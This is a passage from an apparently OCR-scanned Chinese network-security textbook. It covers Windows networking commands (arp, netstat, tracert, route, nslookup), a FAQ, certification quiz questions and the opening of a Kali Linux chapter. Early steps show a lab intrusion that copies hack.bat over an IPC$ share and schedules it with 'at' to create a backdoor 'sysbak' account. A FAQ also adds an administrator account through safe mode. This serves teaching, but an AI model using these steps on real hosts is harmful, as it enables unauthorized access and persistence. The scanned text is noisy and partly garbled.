(5) 利用 IPC$ 通道 从 本 地 主机 C 盘 根 目 录 复 制 批 处 理 文件 hack. bat 到 目标 主机 的 
C 盘 根 目 录 。 在 本 地 主机 的 命令 提示 符 窗口 中 执行 copy c:\hack. bat \\192. 168. 5. 2\c 
$ 命令 ,如 图 1-42 所 示 。 

提示 : 成 功 运行 此 命令 的 前 提 是 本 地 主机 的 C 盘 根 目 录 要 有 hack. bat 文件 、 目 标 主 
机 的 C 盘 必 须 隐藏 共享 。 


:sers\Adninistrator)copy c:\hack.bat \\92.168.5.2\c$ 


1 个 文件 





图 1-42 通过 IPCS$ 连接 复制 批 处 理 文件 到 目标 主机 


(6) 通过 计划 任务 使 远程 主机 执行 hack. bat 文件 。 在 本 地 主机 的 命令 提示 符 窗口 
中 执行 net time \\192. 168. 5. 2 命令 ,会 回 显 目标 主机 当前 的 系统 时 间 。 

(7) 在 本 地 主机 的 命令 提示 符 窗口 中 执行 at \\192. 168. 5. 2 9:37 c:\hack. bat 命令 , 表 
示 在 上 午 9 点 37 分 执行 目标 主机 C 盘 根 目录 的 hack. bat 批 处 理 文件 ,如 图 1-43 所 示 。 

注意 : 执行 批 处 理 文 件 的 时 间 要 比 回 显 的 系统 时 间 晚 一 点 。 


:sers\Adninistrator net tine \\92.168.5.2 
N92.168.5.2 的 当前 时 间 是 2816/8/28 9:36:44 


命令 成 功 完成 。 


:sers\AdninistratorYat \\192.168.5.2 9:37 c:\hack.bat 


新 加 了 一 项 作业 ， 其 作业 Ip = 5 





图 1-43 利用 at 命令 添加 计划 任务 


(8) 计划 任务 添加 完毕 后 ,使 用 命令 net use * /del 断 开 IPC$ 连接 。 

(9) 最 后 验证 账号 是 否 成 功 建立 。 等 待 一 段 时间 后 ,估计 远程 主机 已 经 执行 了 hack. 
bat 文件 ,通过 telnet 远程 登录 来 验证 是 否 成 功 建立 sysbak 账号 ,如 果 连 接 成 功 ,表示 
sysbak 账号 已 经 成 功 建立 。 

4) 利用 arp 命令 防范 ARP 攻击 

地 址 解析 协议 (Address Resolution Protocol, ARP) 是 TCP/IP 协议 簇 网 络 层 的 一 个 
协议 ,为 每 个 网 络 节点 建立 IP 地 址 与 MAC 地 址 之 间 的 对 应 (上 映射) 关系。RARP 协议 负 
责 为 每 个 网 络 节点 建立 MAC 地 址 与 IP 之 间 的 映射 关系 。 命 令 arp 用 于 显示 和 修改 地 
址 解析 协议 缓存 中 的 项 目 。 选 项 -a 用 于 显示 所 有 接口 的 当前 ARP 表 项 ,格式 为 arp -a。 
选项 -s 用 于 添加 一 个 静态 ARP 表 项 ,将 某 个 IP 地 址 与 MAC 地 址 关联 ,格式 为 “arp -s IP 
地 址 物理 地 址 ”。 选 项 -d 用 于 删除 指定 的 ARP 表 项 ,格式 为 “arp -d IP 地 址 ”。 当 网 络 感 
染 ARP 木马 时 ,主机 或 网 关 所 对 应 的 MAC 地 址 被 修改 。 可 执行 arp -d 清除 ARP 缓存 
表 , 然 后 再 使 用 arp -s 命令 重新 绑 定 正确 的 IP 地 址 与 MAC 地址 对 。 下 面 介绍 ARP 命 
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令 的 具体 配置 方法 。 

(1) 打开 计算 机 的 命令 提示 符 窗口 ,执行 命令 arp -a 可 以 查看 当前 计算 机 所 有 网 络 
接口 的 ARP 缓存 表 项 内 容 , 包 括 IP 地址、 物理 地 址 和 类 型 。 网 络 适配器 自动 学 习 到 的 映 
射 关系 为 动态 类 型 ,手动 添加 的 映射 关系 为 静态 类 型 。 

(2) 在 命令 提示 符 窗口 中 执行 命令 arp -s 192. 168. 5. 3 00-aa-00-62-cl-22, 可 以 向 
ARP 缓存 添加 将 IP 地 址 192. 168. 5. 3 解析 成 物理 地 址 00-aa-00-62-c1-22 的 静态 项 ,如 
图 1-44 所 示 。 注 意 ,IP 地 址 用 十 进 制 数值 表示 ,物理 地 址 用 十 六 进 制 数 值 表示 。 通 过 -s 
参数 添加 的 静态 项 不 会 在 ARP 缓存 中 超时 ,如 果 TCP/IP 终止 后 再 启动 ,这 些 项 会 被 删 
除 ,车 要 创建 永久 的 静态 ARP 缓存 项 ,需要 通过 “计划 任务 程序 ”在 启动 时 运行 使 用 arp 
命令 的 批 处 理 文件 。 


:sers\Adninistrator arp -a 


口 : 192.168.5.1 —— @ 


接 xb 
Internet 地 址 物理 地 址 


192.168.5.2 800-8c-29-86-46-88 

80-aa-08-62-c1-22 
192.168.5.255 生生 一 上 全 一 下 下 一 下定 一 站 一 和 
224.9.0.22 81-80-5e-80-80-16 
224.9.0.252 81-98-5e-98-99-fc 
239-255.255.2598 @1-86-5e-7f -ff -fa 





图 1-44 添加 ARP 缓存 条 目 


(3) 在 命令 提示 符 窗口 中 执行 命令 arp -d 192. 168. 5.3 ,可 以 从 ARP 缓存 删除 将 IP 
地 址 192. 168. 5. 3 解析 成 物理 地 址 00-aa-00-62-cl-22 的 静态 项 ,再 用 arp -a 命令 查看 
ARP 缓存 时 已 经 找 不 到 该 映射 条 目 . 如 图 1-45 所 示 。 


:sers\Adninistrator’arp -dl 192.168.5.3 
:sers\Adninistrator>anp -a 


瞎 口 : 192.168.5.1 一 - @xb 
Internet 地 址 物理 地 址 
192.168.5.2 098-8c-29-96-46-88 
192.168.5.255 EE -EEEL EEE -EE 
224.8.0.22 B01-80-5e-86-06-16 


224.0.0.252 61-98-5e-99-98-fc 
239.255.255.258 81-80-5e-7F -fF -fa 





图 1-45 删除 ARP 缓存 条 目 


5) 使 用 netstat 命令 查看 计算 机 是 否 “ 身 处 险 境 ” 

netstat 命令 是 Windows 操作 系统 内 赃 的 命令 ,是 一 个 监控 TCP/IP 网 络 非常 有 用 的 
小 工具 ,用 来 查看 网 络 状态 ,其 操作 简便 ,功能 强大 。 主 要 用 来 显示 网 络 路 由 表 、 实 际 网 络 
连接 以 及 每 一 个 网 络 接口 状态 信息 ,以 及 与 IP、TCP、UDP 以 及 ICMP 有 关 的 统计 数据 ， 
一 般 用 于 检验 本 机 与 远程 计算 机 各 端口 的 网 络 连接 情况 。 

netstat 命令 的 语法 格式 如 下 。 









































netstat [~a]l [-b][-el[-n][-ol[-pprotol[-rl[-s] [一 v] [interval] 


选项 [-a] 用 于 显示 活动 的 TCP 连接 、 侦 听 端 口 ,选项 [-e] 用 于 显示 以 太 网 统计 信和 
选项 [-p] 用 于 显示 指定 协议 的 连接 ,选项 [-r] 用 于 显示 路 由 表 内 容 , 选 项 [-s] 用 于 显示 按 
命令 中 各 参数 的 操作 如 下 。 
(1) 选择 “开始 ”~ 所 有 程序 ”附件 ”一 “命令 提示 符 ” 命 令 ,打开 命令 提示 符 窗口 。 
(2) 在 打开 的 命令 提示 符 窗口 中 执行 netstat -an 命令 即 可 查看 本 地 计算 机 所 开放 的 
息 ,如 图 1-46 所 示 。 












端口 


国 aE 


C:\Documents and Settings\Adninistratornetstat -an 








ddress State 
LISTENING 
LISTENING 
LISTENING CC 
LISTENING 
LISTENING 
TIME_WAIT 
TIME_ WAIT 
LISTENING 
LISTENING 








图 1-46 ”netstat -an 窗口 


(3) 在 打开 的 命令 提示 符 窗口 中 执行 netstat -a 命令 即 可 查看 本 机 与 所 有 连接 的 端 
口 情况 : 显示 使 用 协议 ` 本 地 地 址 .远程 地 址 .开放 端口 以 及 状态 信息 ,包括 已 经 建立 连接 
(ESTABLISHED) 与 监听 连接 请 求 CLISTENING) ,可 以 让 用 户 了 解 目前 都 有 哪些 网 络 
连接 正在 运行 ,如 图 1-47 所 示 








国 =|e|¥ 


IC:\Docunents and Settings\hdninistrator>netstat -a 








Active Connections 


Proto Local Addm Foreign Add State 

TCP 206096326-1043:epnap 28898326-18 LISTENING 

TCP 。 29998326-1943:nicrosoft-ds 28896326-1643:@ LISTENING 
TCP 。 29998326-1943:1297?1 28998326-18: LISTENING 

ICP 。 29998326-1943: 29999326-18: LISTENING 

ICP 。 29998326-1943: ios-ssn 28898326-1643:@ LISTENING 
TCP 28098326-1043: 112.98.138.238:http TIME WAIT 

TCP 286096326-1043: reverse.gdsz.cncnet.net:http TIME_WAIT 
TCP 。 29998326-1843: i n 29898326-18 LISTENING 
ICP 。 29998326-1943: i 28898326-184: LISTENING 
UDP -288698326-104: 

UDP 。 29998326-194: 

UDP 299398326-1843:: 








图 1-47 netstat -a 命令 执行 结果 


(4) 在 打开 的 命令 提示 符 窗口 中 执行 netstat -b 命令 即 可 查看 包含 于 每 个 连接 或 监 
听 端 口 的 可 执行 组 件 ,如 图 1-48 所 示 。 
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IC: Docunents and Settings hdninistratorynetstat -hb 


LT 


Proto Local fddres Foreign hdd State 
TCP 289838326-184: 2 56.251.158.61.ha.cnc:http ESTABLISHED 
[QQMusic .exe] 


TCP -268698326-1643:3848 TIME_WAIT 
TCP -26696326-1643:3841 TIME_WAIT 








图 1-48 netstat -b 命令 执行 结果 





(5) 在 打开 的 命令 提示 符 窗口 中 执行 netstat -e 命令 即 可 查看 以 太 网 数据 统计 信息 ， 
它 列 出 了 接收 和 发 送 的 数据 包 数 量 , 包 括 接收 和 发 送 数据 包 的 总 字 节 数 . 单 播 数据 包 、 非 
单 播 数据 包 、 上 废弃 的 数据 、 错 误 的 数据 和 未 知 协议 的 数据 ,用 来 统计 基本 的 网 络 流量 ,可 以 
与 -s 选项 结合 使 用 ,如 图 1-49 所 示 











国 a 
C:\Documents and Settings\Adninistrator netstat -e 
Interface Statistics 





Received Sent 


69547742 8833164 

B1513 88993 

1579 153 

a 

Errors a 
Unknown protocols 





图 1-49 netstat -e 命令 执行 结果 


(6) 在 打开 的 命令 提示 符 窗口 中 执行 netstat -n 命令 即 可 查看 以 网 络 IP 地 址 代替 名 
称 , 显 示 网 络 连接 情形 ,如 图 1-50 所 示 
= 上 | 革 | 
Cc: Docunents and Settingsshdninistratorynetstat -n < 
Active Connections 


Proto Local hddr Foreign Addr State 
ICP 192.168.75.5: 192.168.75.57: TIME_WAIT 





1-50 ”netstat -n 命令 执行 结果 
(7) 在 打开 的 命令 提示 符 窗口 中 执行 netstat -o 命令 即 可 查看 与 每 个 连接 相关 的 所 

属 进程 ID, 如 图 1-51 所 示 。 
=|e|x| 


IC: \Docunents and Settings\Adninistratormnetstat -0 


Active Connections 


Proto Local Addr Foreign Add State 
TCP 288986326-1843:3188 bogon:nethi TIME_WRIT 








图 1-51 netstat -o 命令 执行 结果 
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(8) 在 打开 的 命令 提示 符 窗口 中 执行 netstat -p pro 命令 (pro 可 以 是 tcp 或 udp) , 即 
可 查看 pro 指定 协议 的 连接 信息 ,如 图 1-52 所 示 。 


C:\Documents and Settings\Adninistratornetstat -了 tcp 


ctive Connections 


Proto Local hddress Foreign hd State 
TCP 。 29899326-1843:3198 bogon:neth TIME_WRIT 








图 1-52 netstat -p tcp 命令 执行 结果 


(9) 在 打开 的 命令 提示 符 窗 口中 执行 netstat -r 命令 即 可 查看 路 由 表 信息 。 

(10) 在 打开 的 命令 提示 符 窗口 中 执行 netstat -s 命令 即 可 查看 每 个 协议 的 配置 统 
计 , 包 括 TCP、IP、UDP、ICMP 等 协议 ,可 以 与 -e 选项 结合 使 用 。 

6) 利用 tracert 命令 确定 访问 目标 通过 的 路 径 

Windows 系统 中 的 tracert 命令 是 路 由 跟踪 实用 程序 ,用 于 确定 IP 数据 包 访问 目标 
所 通过 的 路 径 。tracert 命令 通过 发 送 包 含 不 同 IP 生存 时 间 字 段 TTL 的 ICMP 超时 通 
告 报 文 并 监听 回应 报 文 来 确定 从 一 个 主机 到 网 络 上 其 他 主机 的 路 由 。 如 果 网 络 连通 有 问 
题 , 可 用 tracert 命令 检查 到 达 目 标 IP 地 址 的 路 径 , 并 记录 经 过 的 路 径 。 通 常 当 网 络 出 现 
故障 需要 检查 网 络 故 障 的 位 置 时 ,可 以 使 用 tracert 命令 来 确定 网 络 在 哪个 环节 上 出 了 
问题 。 

tracert 的 工作 原理 是 , 当 使 用 tracert 命令 向 目标 网 络 发 送 不 同 IP 生存 时 间 (TTL) 
值 数据 包 ,tracert 诊断 程序 确定 到 目标 所 采取 的 路 由 ,要 求 路 径 上 的 每 台 路 由 器 在 转发 


数据 包 之 前 ,至 少将 数据 包 上 的 TTL 递减 1。 一 般 来 说 启动 tracert 程序 后 , 先 发 送 TTL 





为 1 的 回应 数据 包 , 并 在 随后 的 每 次 发 送 过 程 将 TTL 递增 1, 直 到 目标 响应 或 TTL 达到 

最 大 值 ,从 而 确定 路 由 。 当 数据 包 上 的 TTL 减 为 0 时 ,路 由 器 应 该 将 “ICMP 已 超时 ”的 

消息 发 回 源 系 统 。 通 过 检查 中 间 路 由 器 发 回 "ICMP 已 超时 ?消息 ,确定 网 络 的 路 由 。 
tracert 命令 的 语法 格式 如 下 。 


tracert [- d] [ - hmaxmum hops] [ - j host— list] [ - w timeoute] target_name 


其 中 ,[-dj] 表 示 不 把 IP 地 址 解析 成 域名 ; [-h maxmum_hops] 表 示人 允许 跟踪 的 最 大 
跳 数 ; [-j host-listj 表 示 经 过 的 主机 列表 ; [-w timeoute] 表 示 每 次 恢复 的 最 大 允许 延 时 。 

利用 tracert 命令 搜索 网 站 结构 信息 的 具体 操作 如 下 。 

(1) 选择 “开始 ”一 “所 有 程序 ”附件 ”命令 提示 符 ” 命 令 ,打开 命令 提示 符 窗口 。 

(2) 在 命令 提示 符 窗 口中 执行 tracert www. sina. com. cn 命令 , 即 可 在 返回 的 结果 中 
获知 数据 包 经 过 了 哪些 节点 ,如 图 1-53 所 示 。 

如 果 已 经 知道 了 局 域 网 内 某 个 目标 主机 的 名 称 , 那 么 可 以 使 用 tracert 命令 来 获取 该 
主机 的 IP 地址。 也 可 以 通过 tracert 命令 追踪 那些 神秘 网 友 的 IP 地 址 ,了 解 其 中 都 经 蔷 
了 哪些 中 转 站 。 

7) 使 用 route 命令 查看 修改 路 由 条 目 

route print 命令 一 般 用 于 Windows 操作 系统 查看 本 机 的 路 由 表 信息 ,了 解 网 络 中 设 
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Tracing route to libra.sina.con.cn [282.188.33.92] 
over a naxinun of 38 h 


<ins <1 
ins 1 


vs sbogon [192.168.75.1] 


192.168.253.254 
221.4.148.241 
128.88.285 .161 
128.89.9.241 


123.126.8.162 
61.148.143.26 
218.74.176.138 
282.188.33.92 


mm 
nm: 
m: 
m: 
mm 
m: 
me: 
m: 
mm 
m: 


33833 


[Trace complete- 





1-53 ”搜索 网 站 结构 信息 


备 分 布 情况 ,该 命令 只 有 当 安 装 了 TCP/IP 之 后 才能 使 用 。 
使 用 route print 命令 查看 本 地 IP 信息 的 具体 操作 如 下 
(1) 选择 “开始 ”一 所 有 程序 ”附件 ”一 “命令 提示 符 ” 命 令 ,打开 命令 提示 符 窗口 。 
(2) 在 命令 提示 符 窗口 中 执行 route print 命令 , 即 可 在 命令 提示 符 窗 口中 显示 当前 
主机 的 路 由 信息 ,如 图 1-54 所 示 





C:\Documents and Settings\Adninistrator>route print 


IPv4 Route Table 


Ms TCP Loophack interface 
VMware Accelerated AMD PCNet Adapt' 


Gatevay Interface Metric 
127.8.0.1 
192.168.5.2 


192.168.5.2 








1-54 显示 路 由 信息 
使 用 route print 命令 显示 本 机 路 由 表 信 





息 ,分 为 5 列 , 第 1 Network Destination 


是 网 络 目标 地 址 列 , 列 出 了 本 地 计算 机 连接 的 所 有 的 子 网 段 地 第 2 列 Netmask 是 目 
tt 的 子 网 掩 码 ,让 ee 备 确定 目标 网 络 的 地 址 
类 。 第 3 列 Gateway 是 网 关 列 ,一 旦 三 层 路 由 设备 确定 要 把 接收 到 的 数据 包 转 发 到 哪 


个 目的 网 络 ,三 层 路 由 设 ey 确定 该 数据 包 应 该 转发 到 哪 一 个 网 络 地址 
才能 到 达 目 标 网 络 。 第 4 列 Interface 是 接口 列 , 告 诉 三 层 路 由 设备 哪 一 块 网 卡 连接 到 合 
适 目标 网 络 。 第 5 列 Metric 是 度量 值 ,告诉 三 层 路 由 设备 为 数据 包 选 择 目标 网 络 优先 级 。 
在 通 向 一 个 目标 网 络 如 果 有 多 条 路 径 ,Windows 将 查看 度量 值 .度量 值 越 小 路 径 越 短 。 
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8) 使 用 nslookup 命令 查询 域名 信息 

nslookup 命令 是 Windows 操作 系统 内 嵌 的 命令 ,是 一 个 监测 网 络 中 DNS 服务 器 是 
和 否 能 正确 实现 域名 解析 的 命令 行 工具 ,是 一 个 查询 域名 信息 非常 有 用 的 工具 。nslookup 
可 以 查 到 DNS 记录 的 生存 时 间 ,还 可 以 指定 使 用 哪个 DNS 服务 器 进行 解释 。 

使 用 nslookup 命令 查询 域名 信息 的 具体 操作 如 下 。 

(1) 选择 “开始 ”>“ 所 有 程序 ”>“ 附 件 ” 一 “命令 提示 符 ” 命 令 ,打开 命令 提示 符 窗口 。 

(2) 在 打开 的 命令 提示 符 窗口 中 执行 nslookup 命令 即 可 查看 正在 工作 的 DNS 服务 
器 主机 的 名 称 和 IP 地 址 。 

(3) 在 打开 的 命令 提示 符 窗口 中 执行 “nslookup 域名 ”或 “nslookup IP 地 址 ”命令 ,可 
查看 DNS 服务 器 的 正 向 解析 和 反 向 解析 是 否 正常 。 


1.5 常见 问题 解答 


1. 使 用 ren 和 copy con 等 DOS 命令 使 用 系统 显示 “拒绝 服务 ”, 该 如 何 处 理 ? 

答 : 选择 “开始 ”>“ 所 有 程序 >“ 附件” 命令 ,然后 右 击 “命令 提示 符 ” 命 令 , 在 弹出 的 
快捷 菜单 中 执行 “以 管理 员 身 份 运行 ”命令 ,弹出 “用 户 账户 控制 "对话 框 , 单 击 “ 是 ”按钮 。 
也 可 以 右 击 “命令 提示 符 ” 命 令 ,在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 ,在 “命令 提示 符 属 
性 ”对 话 框 中 选择 “快捷 方式 ”选项 卡 , 单 击 “ 高 级 ”按钮 ,选中 “用 管理 员 身份 运行 " 复 选 框 ， 
单 击 “ 确 定 ” 按 钮 。 

2. 怎样 确定 计算 机 资源 共享 成 功 了 ? 

答 : 有 两 种 方法 可 以 验证 是 否 共享 成 功 ,第 一 种 方法 是 使 用 net share 命令 进行 查 
看 。 第 二 种 方法 就 是 打开 “计算 机 ”窗口 进行 验证 。 会 看 到 C 盘 图 标 下 有 两 个 头像 ,如 果 
没有 看 到 ,可 以 右 击 “刷新 "命令 , 即 可 看 到 。 

3. 忘记 系统 的 登录 密码 怎么 办 ? 

答 : 以 恢复 本 地 用 户 magic 口令 为 例 , 来 说 明 解决 忘记 登录 密码 的 步骤 : 重新 启动 计 
算 机 ,在 启动 画面 出 现 后 马上 按 F8 键 ,选择 * 带 命令 行 的 安全 模式 命令。 运行 过 程 结束 
时 ,系统 列 出 了 系统 超级 用 户 administrator 和 本 地 用 户 magic 的 选择 菜单 ,执行 
administrator 命令 ,进入 命令 行 模式 。 执 行 命令 net user magic 123456 /add, 强制 将 
magic 的 用 户口 令 更 改 为 123456。 若 想 在 此 添加 一 新 用 户 ( 如 用 户 名 为 abc, 口 令 为 
123) ,可 执行 net user abc 123 /add 命令 ,添加 后 再 用 net localgroup administrators abc / 
add 命令 将 用 户 提升 为 管理 员 组 Administrators 的 成 员 ,并 使 其 具有 超级 权限 。 


1.6 认证 试题 
一 、 选 择 是 
1. 安全 工作 的 目的 是 “ 进 不 来 、 拿 不 走 、 改 不 了 、 看 不 懂 、 跑 不 了 ”, 其 中 * 进 不 来 "对 应 


网 络 安全 的 ( ) 特 性 ,“ 拿 不 走 ” 对 应 网 络 安全 的 ( ) 特 性 ,“ 改 不 了 ”对 应 网 络 安 全 的 
( ) 特 性 ,“ 看 不 懂 ” 对 应 网 络 安全 的 ( ) 特 性 ,“ 跑 不 了 ”对 应 网 络 安全 的 ( ) 
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特性 。 
A. 保密 性 B. 完整 性 C. 可 用 性 
D. 可 控 性 E. 不 可 否认 性 
2. 下 列 破坏 了 数据 的 完整 性 的 情况 是 (  )。 
A. 假冒 他 人 IP 地 址 发 送 数据 B. 数据 在 传输 过 程 中 被 窃听 
C. 数据 在 传输 过 程 中 被 自 改 D. 被 攻击 后 的 服务 器 无 法 提供 服务 
3. 信息 不 泄露 给 非 授权 的 用 户 指 的 是 信息 的 ( ) 特 性 。 
A. 保密 性 B. 完整 性 C. 可 用 性 
D. 可 控 性 E. 不 可 否认 性 


4. 在 网 络 安全 中 ,中 断 是 指 攻 击 者 破坏 网 络 系统 的 资源 ,使 之 变 成 无 效 的 或 无 用 的 ， 
这 是 对 ( ) 的 攻击 。 





A. 保密 性 B. 完整 性 C. 可 用 性 
D. 可 控 性 E. 不 可 否认 性 
5. 信息 风险 主要 是 指 ( ) 。 
A. 信息 存储 安全 B. 信息 传输 安全 
C. 信息 访问 安全 D. 以 上 都 对 
6. 黑客 搭 线 窃听 属于 ( ) 风 险 。 
A. 信息 存储 安全 B. 信息 传输 安全 
C. 信息 访问 安全 D. 以 上 都 不 对 
7. 在 Windows 操作 环境 中 ,采用 ( ) 命 令 来 查看 本 机 开放 端口 情况 。 
A. ping B. tracert C. netstat D. ipconfig 


8. 某 客户 端 采用 ping 命令 检测 网 络 连 接 故障 时 ,发 现 可 以 Ping 通 127. 0. 0. 1 及 本 
机 的 IP 地 址 ,但 无 法 Ping 通 同一 网 段 内 其 他 工作 正常 的 计算 机 的 IP 地 址 ,该 客户 端的 


故障 可 能 是 (  )。 
A. TCP/IP 协议 不 能 正常 工作 B. 本 机 网 卡 不 能 正常 工作 
C. 本 机 网 络 接口 故障 D. 本 机 DNS 服务 器 地 址 设置 错误 


9. 下 面 关 于 ICMP 协议 的 描述 中 ,正确 的 是 ( )。 
A. ICMP 协议 根据 MAC 地 址 查找 对 应 的 IP 地 址 
B. ICMP 协议 把 公 网 的 IP 地 址 转换 为 私 网 的 IP 地 址 
C. ICMP 协议 根据 网 络 通信 的 情况 把 控制 报 文 发 送 给 发 送 方 主机 
D. ICMP 协议 集中 管理 网 络 中 的 IP 地 址 分 配 
10. 在 Windows 操作 系统 中 ,如 果 要 查找 从 本 地 出 发 ,经 过 三 个 跳 步 ,到 达 名 字 为 
sdpt 的 目标 主机 的 路 径 , 则 执行 的 命令 是 ( 二 


A. tracert sdpt -h 3 B. tracert -j 3 sdpt 

C. tracert -h 3 sdpt D. tracert sdpt -jj 3 
11. 能 显示 TCP 和 UDP 连接 信息 的 命令 是 ( 。 )。 

A. netstat -s B. netstat -e 


C. netstat -r D. netstat -a 
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12. 企业 局 域 网 中 如 果 某 台 计算 机 受到 了 ARP 欺骗 ,那么 它 发 出 去 的 数据 包 中 


( ) 是 错误 的 。 
A. 源 IP 地 址 B. 目标 了 P 地 址 
C. 源 MAC 地 址 D. 目标 MAC 地 址 


13. 在 Windows 操作 系统 中 ,对 网 关 IP 和 MAC 地 址 进行 绑 定 的 操作 为 ( ) 。 
A. arp -a 192. 168. 1. 1 0c-82-68-d0-da-ba 
B. arp -b 192. 168. 1. 1 0c-82-68-d0-da-ba 
C. arp -d 192. 168. 1. 1 0c-82-68-d0-da-ba 
D. arp -s 192. 168. 1. 1 0c-82-68-d0-da-ba 
14. 下 列 不 是 VMware 提供 的 网 络 工作 模式 的 是 ( Ds 





A. Bridged( 桥 接 模式 ) B. NAT( 网 络 地址 转换 模式 ) 
C. Host-only( 仅 主机 模式 ) D. Routing( 路 由 模式 ) 

二 、 填 空 题 

1. 网 络 安全 五 要 素 是 5 和 。 

2. FTP 协议 使 用 端口 ,Telnet 协议 使 用 端口 ,SMTP 协议 使 用 
端口 ,POP3 协议 使 用 端口 ,HTTP 协议 使 用 端口 ,DNS 协议 

使 用 端口 。 

3. Windows 系统 中 删除 C 盘 默 认 共享 的 命令 是 

三 、 判 断 题 

ARP 欺骗 只 会 影响 计算 机 ,而 不 会 影响 交换 机 和 路 由 器 等 网 络 设备 。( ) 

四 、 简 答题 


1. 一 般 系统 攻击 有 哪些 步骤 ? 各 步骤 主要 完成 什么 工作 ? 
2. 什么 是 端口 ? 如 何 查看 本 地 计算 机 端口 的 开放 情况 ? 


五 、 操 作 题 


1. 在 自己 的 计算 机 上 使 用 netstat 命令 查看 网 络 状况 。 
2. 使 用 tracert 命令 追踪 百度 网 站 (www. baidu. com) 的 IP 信息 。 


黑客 操作 系统 Kali Linux 的 安装 与 设置 


皮 --------------------------------------------------------------- Project 2 


2.1 用 户 需求 与 分 析 


由 于 网 络 的 使 用 越 来 越 广泛 ,网 络 安全 问题 也 越 来 越 被 大 众 关 注 。 渗 透 测试 是 对 用 
户 信 息 安 全 措施 积极 评估 的 过 程 。 通 过 系统 化 的 操作 和 分 析 , 积 极 发 现 系统 和 网 络 中 存 
在 的 各 种 缺陷 和 弱点 ,如 设计 缺陷 和 技术 缺陷 。 黑 客 攻击 软件 的 下 载 和 安装 是 一 个 浩大 
的 工程 ,为 了 方便 进行 黑客 攻击 研究 ,有 人 将 所 有 工具 都 预 装 在 一 个 Linux 系统 中 ,其 中 
典型 的 操作 系统 就 是 Kali Linux。Kali Linux 于 2013 年 发 布 , 集 成 了 海量 的 攻击 测试 工 
具 , 通 过 模拟 恶意 黑客 的 攻击 方法 ,来 评估 计算 机 网 络 系统 安全 ,包括 对 系统 弱点 .技术 缺 
陷 或 漏洞 的 主动 分 析 。 安 装 和 设置 好 Kali Linux 操作 系统 后 ,就 可 以 使 用 它 进 行 网 络 攻 
击 演练 了 。 


2.2 预备 知识 

2 2 1 渗透 测试 简介 

渗透 测试 并 没有 一 个 标准 的 定义 。 国 外 一 些 安全 组 织 达 成 共识 的 通用 说 法 是 ,渗透 
测试 是 通过 模拟 恶意 黑客 的 攻击 方法 ,来 评估 计算 机 网 络 系统 安全 的 一 种 评估 方法 ,这 个 
过 程 包括 对 系统 的 任何 弱点 、 技 术 缺 陷 或 漏洞 的 主动 分 析 。 这 个 分 析 是 从 一 个 攻击 者 可 
能 存在 的 位 置 来 进行 的 ,并 且 从 这 个 位 置 有 条 件 主 动 利 用 安全 漏洞 。 

渗透 测试 与 其 他 评估 方法 不 同 。 通 常 的 评估 方法 是 根据 已 知 信息 资源 或 其 他 被 评估 
对 象 ,去 发 现 所 有 相关 的 安全 问题 。 渗 透 测试 是 根据 已 知 可 利用 的 安全 漏洞 ,去 发 现 是 否 
存在 相应 的 信息 资源 。 相 比较 而 言 ,通常 评估 方法 对 评估 结果 更 具有 全 面 性 ,而 渗透 测试 
更 注重 安全 漏洞 的 严重 性 。 

渗透 测试 有 黑 盒 和 白 盒 两 种 测试 方法 。 黑 盒 测 试 是 指 在 对 基础 设施 不 知情 的 情况 下 
进行 测试 。 白 盒 测 试 是 指 在 完全 了 解 结构 的 情况 下 进行 测试 。 不 论 测 试 方法 是 否 相同 ， 


























渗透 测试 通常 具有 两 个 显著 特点 : 四 渗透 测试 是 一 个 渐进 的 上 且 逐 步 深 入 的 过 程 ; @ 渗 透 
测试 是 选择 不 影响 业务 系统 正常 运行 的 攻击 方法 进行 的 测试 。 


222 Kdi Lnx 简 介 


Kali Linux 的 前 身 是 BackTrack Linux 发 行 版 。Kali Linux 是 一 个 基于 Debian 的 
Linux 发 行 版 ,包括 600 多 种 安全 和 取证 方面 的 相关 工具 ,支持 ARM 架构 ,主要 用 于 渗 
透 测试 。 手 机 的 CPU 为 ARM 架构 ,PC 或 PC 服务 器 通常 为 x86:i686(32 位 CPU) 或 
x86_64(64 位 CPU)。 它 预 装 了 很 多 渗透 测试 软件 ,包括 端口 扫描 器 nmap、 数 据 包 分 析 
器 wireshark、 密 码 破 解 John the Ripper 及 一 套用 于 对 无 线 局 域 网 进行 渗透 测试 的 软件 
Aircrack-ng。 它 由 进攻 安全 公司 (Offensive Security Ltd. ) 维 护 和 资助 ,最 先 由 Offensive 
Security 的 马 蒂 。 阿 罗 尼 和 德 文 . 卡 恩 斯 通过 重 写 BackTrack 来 完成 。BackTrack 是 基 
于 Ubuntu 的 一 个 Linux 发 行 版 。 

Kali Linux 有 32 位 和 64 位 的 版 本 ,可 用 于 x86 指令 集 。 同 时 它 还 有 基于 ARM 架 
构 的 版 本 ,可 以 用 于 树 莓 派 和 三 星 的 ARM Chromebook。 用 户 可 以 通过 硬盘 、USB 驱动 
器 、 树 莓 派 ` VMware Workstation 来 运行 Kali Linux 操作 系统 。 

Kali Linux 的 安装 非常 “傻瓜 化 ”, 只 须 点 击 几 下 鼠标 就 能 完成 。Kali Linux 安装 的 
磁盘 空间 最 小 值 是 8GB, 但 为 了 便于 使 用 ,推荐 至 少 20GB 去 保存 附加 程序 和 文件 ,内 存 
最 好 为 512MB 以 上 ,Kali 的 官方 网 站 地 址 是 : https://www. kali. org/,Kali Linux 的 下 
载 地 址 为 : https://www. kali. org/downloads/ ,下 载 界 面 如 图 2-1 所 示 , 中 文官 网 地 址 
是 : http://cn. docs. kali. org/ 。 





Download Kali Linux Images 


le generate fresh Kali Linux image files every few months, which we make available for download. This paggl 
外 the links to download Kali Linux in its latest official release. For a release history, check our Kali Linuy 
eleases page. Please note: You can find unofficial, untested weekly releases at http://cdimage.kali.org/kali-weekly/. 





Image Name Download Size Version sha256sum 
Kali 64 bit ISO|Torrent | 2.9G 2016.2 | 1d96432e6d5c6f46dfe9589d9d6456a53b8add9a55f71371d691a5d454fag431 
Kali 32 bit ISO|Torrent | 2.9G 2016.2 | c94772c4fd71f58b245c7b15f4f225ad7c751879f561falcf698beb1469c9bf5 
Kali 64 bit Light | IsSO|Torrent 1.1G 2016.2 | 997f5ed6f7c99c4518288c7e2c4b684blbdcc2fbee2c152d7ecbd17f9536c29f 





Kali32bitLight | IsO|Torrent | 1.16 | 2016.2 | S99e6df2e8e@b4d42bf3dd4e4c7d6acf24b7262fabda52a9c6c3b35086def295 








图 2-1 下 载 Kali Linux 界面 
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2 2 3 Becklrak 简 介 


BackTrack 是 一 套 专 业 的 计算 机 安全 检测 的 Linux 操作 系统 ,简称 BT。BackTrack 
